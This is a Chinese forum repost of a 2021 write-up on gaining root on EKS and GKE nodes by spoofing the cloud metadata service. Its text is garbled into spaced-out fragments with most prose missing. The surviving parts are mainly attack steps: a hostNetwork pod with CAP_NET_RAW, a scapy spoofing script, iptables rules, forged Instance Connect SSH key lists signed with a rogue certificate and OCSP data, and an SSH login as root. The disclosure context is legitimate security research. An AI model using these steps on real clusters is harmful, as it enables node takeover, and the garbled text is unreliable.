搜索

[28998] 2021-06-08_元数据服务MITM允许root权限提升(EKSGKE)

文档创建者:s7ckTeam
浏览次数:124
最后更新:2025-01-19
2021-06-08_元数据服务MITM允许root权限提升(EKSGKE)   M I T M     r o o t     ( E K S   /   G K E ) O t s   2 0 2 1 - 0 6 - 0 8 使   I P v 6   广   M I T M   使   C N I     A R P   L i n u x     ( t c p d u m p )       D o c k e r / C o n t a i n e r d   c r i - o     1 . 1 8   s y s c t l s 使 使   T L S   h t t p : / / 1 6 9 . 2 5 4 . 1 6 9 . 2 5 4   H T T P   访   s s h   A W S G C P   使   s s h     H T T P     s s h     M I T M     s s h     s u d o e r   r o o t 使 +     E K S     G K E     r o o t     M I T M   使 K 8 S   C V E - 2 0 2 0 - 8 5 5 4 A z u r e     s s h   L i n u x     s s h     G K E 访 H T T P D N S D H C P     G K E   h t t p : / / 1 6 9 . 2 5 4 . 1 6 9 . 2 5 4   s s h     s s h     r o o t   1 .     G K E   2 .   3 . m e t a d a t a s c a p e . p y   C A P _ N E T _ R A W C A P _ N E T _ R A W C A P _ N E T _ R A W p i n g n e t . i p v 4 . p i n g _ g r o u p _ r a n g e h o s t N e t w o r k = t r u e C A P _ N E T _ R A W c l o u d - i n i t h o s t N e t w o r k = t r u e C A P _ N E T _ R A W h o s t N e t w o r k = t r u e k u b e c t l   a p p l y   - f   -   < < ' E O F ' a p i V e r s i o n :   v 1 k i n d :   P o d m e t a d a t a :     n a m e :   u b u n t u - n o d e s p e c :     h o s t N e t w o r k :   t r u e     c o n t a i n e r s :     -   n a m e :   u b u n t u         i m a g e :   u b u n t u : l a t e s t         c o m m a n d :   [   " / b i n / s l e e p " ,   " i n f "   ] E O F
4 . 5 . 6 .   s s h     s s h   7 .   2   1 .     k u b e c o n f i g     H T T P     T C P     T C P     G o o g l e   使   H T T P     S S H   1   使   S c a p y   T C P   便 1 .   使   L 2   l o 2 .   使   L 3     l o   使   L 2   S c a p y   F A Q   使   L 3 G K E   使 s y s c t l     L 2   L 3   G o o g l e     G K E     i p t a b l e s     i p t a b l e s   1 . 1 9 . 2 - g k e . 2 4 0 0 1 . 1 8 . 9 - g k e . 2 5 0 0 1 . 1 7 . 1 2 - g k e . 2 5 0 0 1 . 1 6 . 1 5 - g k e . 2 6 0 0   G K E   G C P     K 8 S A W S   E K S A W S   使 E C 2   I n s t a n c e   C o n n e c t   S S H     L i n u x   A W S   A M I     S S H     ( s s h d _ c o n f i g )   e i c _ c u r l _ a u t h o r i z e d _ k e y s h t t p : / / 1 6 9 . 2 5 4 . 1 6 9 . 2 5 4   S S H   H T T P     e i c _ c u r l _ a u t h o r i z e d _ k e y s   1 .   h t t p : / / 1 6 9 . 2 5 4 . 1 6 9 . 2 5 4 / 2 .   P U T   / l a t e s t / a p i / t o k e n - >     v 2   3 .   G E T   / l a t e s t / m e t a - d a t a / i n s t a n c e - i d / - >     I D   / s y s / d e v i c e s / v i r t u a l / d m i / i d / b o a r d _ a s s e t _ t a g   k u b e c t l   c p   m e t a d a t a s c a p y . p y   u b u n t u - n o d e : / m e t a d a t a s c a p y . p y k u b e c t l   e x e c   - t i   u b u n t u - n o d e   - -   / b i n / b a s h a p t   u p d a t e   & &   a p t   i n s t a l l   - y   p y t h o n 3 - s c a p y   o p e n s s h - c l i e n t s s h - k e y g e n   - t   e d 2 5 5 1 9   - f   / r o o t / . s s h / i d _ e d 2 5 5 1 9   - N   " " p y t h o n 3   / m e t a d a t a s c a p y . p y n e t . i p v 4 . c o n f . a l l . r p _ f i l t e r   =   1 i p t a b l e s   - w   - t   m a n g l e   - I   O U T P U T   - s   1 6 9 . 2 5 4 . 1 6 9 . 2 5 4   - j   D R O P A u t h o r i z e d K e y s C o m m a n d   / o p t / a w s / b i n / e i c _ r u n _ a u t h o r i z e d _ k e y s   % u   % f # T i m e s t a m p = 2 1 4 7 4 8 3 6 4 7 # I n s t a n c e = r e a l i n s t a n c e n a m e # C a l l e r = w e d o n t c a r e # R e q u e s t = w e d o n t c a r e s s h - r s a   . . . s h a 2 5 6 / r s a   s i g n a t u r e   i n   b a s e 6 4
4 .   H E A D   / l a t e s t / m e t a - d a t a / m a n a g e d - s s h - k e y s / a c t i v e - k e y s / U S E R / 5 .   G E T   / l a t e s t / m e t a - d a t a / p l a c e m e n t / a v a i l a b i l i t y - z o n e / - >     ( u s - e a s t - 2 ) 6 .   / / / / / - >     a m a z o n a w s . c o m 7 .     5     6     C N e x p e c t e d _ s i g n e r = " m a n a g e d - s s h - s i g n e r . $ { r e g i o n } . $ { d o m a i n } " 8 .   G E T   / l a t e s t / m e t a - d a t a / m a n a g e d - s s h - k e y s / s i g n e r - c e r t / - >     +   9 .   G E T   / l a t e s t / m e t a - d a t a / m a n a g e d - s s h - k e y s / s i g n e r - o c s p / - >     S H A 1   1 0 .   G E T   / l a t e s t / m e t a - d a t a / m a n a g e d - s s h - k e y s / s i g n e r - o c s p / S H A 1 - >     O C S P   1 1 .   G E T   / l a t e s t / m e t a - d a t a / m a n a g e d - s s h - k e y s / a c t i v e - k e y s / U S E R / - >     s s h   1 2 .   e i c _ p a r s e _ a u t h o r i z e d _ k e y s - >     e x p e c t e d _ s i g n e r     O C S P     e i c _ c u r l _ a u t h o r i z e d _ k e y s     M I T M     4 / 6 / 8 / 9 / 1 0 / 1 1     r o o t     S S H   m a n a g e d - s s h - s i g n e r . u s - e a s t - 2 . a m a z o n a w s . c o m     L e t ' s   E n c r y p t     m a n a g e d - s s h - s i g n e r . u s - e a s t - 2 . c h a m p e t i e r . n e t     A W S   E K S     r o o t     h o s t N e t w o r k   p o d   使   P O C     h o s t N e t w o r k   使   G o l a n g   ( g o p a c k e t )   s c a p y   使 1 .   i .   c e r t 0 . p e m C N = m a n a g e d - s s h - s i g n e r . u s - e a s t - 2 . c h a m p e t i e r . n e t 2 0 2 1     1     1 0   i i .   p r i v k e y . p e m   :   i i i .   c e r t 1 . p e m   :   C N = L e t ' s   E n c r y p t   A u t h o r i t y   X 3 i v .   c e r t 2 . p e m   :   C N = D S T     C A   X 3 v .   g o . m o d g o . s u m m i t m m e t a . g o G o l a n g   P O C 2 .     u s - e a s t - 2     E K S     k u b e c t l   c e r t 0 . p e m     u s - e a s t - 2   A M I     A L 2 _ x 8 6 _ 6 4   /   1 . 1 7 . 1 1 - 2 0 2 0 1 0 0 7 3 .     h o s t N e t w o r k   p o d C A P _ N E T _ R A W k u b e c t l   a p p l y   - f   -   < < ' E O F ' a p i V e r s i o n :   v 1 k i n d :   P o d m e t a d a t a : n a m e :   u b u n t u - n o d e s p e c : h o s t N e t w o r k :   t r u e c o n t a i n e r s : -   n a m e :   u b u n t u i m a g e :   u b u n t u : l a t e s t
4 . 7 5 . p o d 6 . 7 .   G o l a n g   P O C 8 .   O C S P   9 .   S S H   1 0 .   A P I s s h   1 1 .   P O C 1 2 .   s h e l l     p o d   1 .     r o o t C e r t i f i c a t e   T r a n s p a r e n c y   线 线 2 0 2 0 - 0 6 - 1 5   K 8 S     H a c k e r O n e   G K E 2 0 2 0 - 0 7 - 0 1 2 0 2 0 - 1 0 - 1 9 E K S A W S   S e c u r i t y c o m m a n d :   [   " / b i n / s l e e p " ,   " i n f "   ] E O F k u b e c t l   c p   .   u b u n t u - n o d e : / k u b e c t l   e x e c   - t i   u b u n t u - n o d e   - -   / b i n / b a s h a p t   u p d a t e   & &   a p t   i n s t a l l   - y   o p e n s s h - c l i e n t   c u r l   o p e n s s l   l i b p c a p - d e v   g o l a n g g o   b u i l d   . d o w n l o a d o c s p ( )   {         f i n g e r p r i n t = $ ( o p e n s s l   x 5 0 9   - n o o u t   - f i n g e r p r i n t   - s h a 1   - i n f o r m   p e m   - i n   " $ { 1 } "   |   / b i n / s e d   - n   ' s / S H A 1   F i n g e r p r i n t [ [ : s p a c e : ] ] * = [ [ : s p a c e : ] ] * ( . * ) / 1 / p '   |   t r   - d   ' : ' )         o c s p _ u r l = " $ ( o p e n s s l   x 5 0 9   - n o o u t   - o c s p _ u r i   - i n   " $ { 1 } " ) "         o p e n s s l   o c s p   - n o _ n o n c e   - i s s u e r   " $ { 2 } "   - c e r t   " $ { 1 } "   - u r l   " $ o c s p _ u r l "   - r e s p o u t   " $ { 3 } / $ f i n g e r p r i n t - r a w "         b a s e 6 4   - w 0   " $ { 3 } / $ f i n g e r p r i n t - r a w "   >   " $ { 3 } / $ f i n g e r p r i n t "         r m   - f   " $ { 3 } / $ f i n g e r p r i n t - r a w " } m k d i r   o c s p d o w n l o a d o c s p   c e r t 0 . p e m   c e r t 1 . p e m   o c s p d o w n l o a d o c s p   c e r t 1 . p e m   c e r t 2 . p e m   o c s p c a t   c e r t 0 . p e m   c e r t 1 . p e m   >   s i g n e r . p e m s s h - k e y g e n   - t   e d 2 5 5 1 9   - f   / r o o t / . s s h / i d _ e d 2 5 5 1 9   - N   " " c a t   >   s s h k e y s - u n s i g n e d   < < E O F # T i m e s t a m p = 2 1 4 7 4 8 3 6 4 7 # I n s t a n c e = $ ( c u r l   h t t p : / / 1 6 9 . 2 5 4 . 1 6 9 . 2 5 4 / l a t e s t / m e t a - d a t a / i n s t a n c e - i d /   - s ) # C a l l e r = w e d o n t c a r e # R e q u e s t = w e d o n t c a r e E O F c a t   / r o o t / . s s h / i d _ e d 2 5 5 1 9 . p u b   > >   s s h k e y s - u n s i g n e d o p e n s s l   d g s t   - s h a 2 5 6   - s i g o p t   r s a _ p a d d i n g _ m o d e : p s s   - s i g o p t   r s a _ p s s _ s a l t l e n : 3 2   - s i g n   p r i v k e y . p e m   s s h k e y s - u n s i g n e d   |   b a s e 6 4   - w 0   >   s s h k e y s - s i g n a t u r e c a t   s s h k e y s - u n s i g n e d   s s h k e y s - s i g n a t u r e   >   s s h k e y s e c h o   " "   > >   s s h k e y s . / m i t m m e t a k u b e c t l   e x e c   - t i   u b u n t u - n o d e   - -   / b i n / b a s h s s h   r o o t @ 1 2 7 . 0 . 0 . 1 C A P _ N E T _ R A W
2 0 2 0 - 1 0 - 2 3 G o o g l e     G K E   2 0 2 0     1 1     1 0   G o o g l e     : )   H a n d i c a p   I n t e r n a t i o n a l 2 0 2 0     1 1     1 2     A W S   2 0 2 0 - 1 1 - 1 7 A W S     2 0 2 0 - 1 0 - 2 2 2 0 2 0 - 1 2 - 0 4 A W S   2 0 2 0 - 1 2 - 0 7   G o o g l e   2 0 2 1 - 0 2 - 0 4 K 8 S   ( H a c k e r O n e )   2 0 2 1 - 0 2 - 1 0 G o o g l e   2 0 2 1 - 0 2 - 2 8   G o o g l e     A W S     K 8 S  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理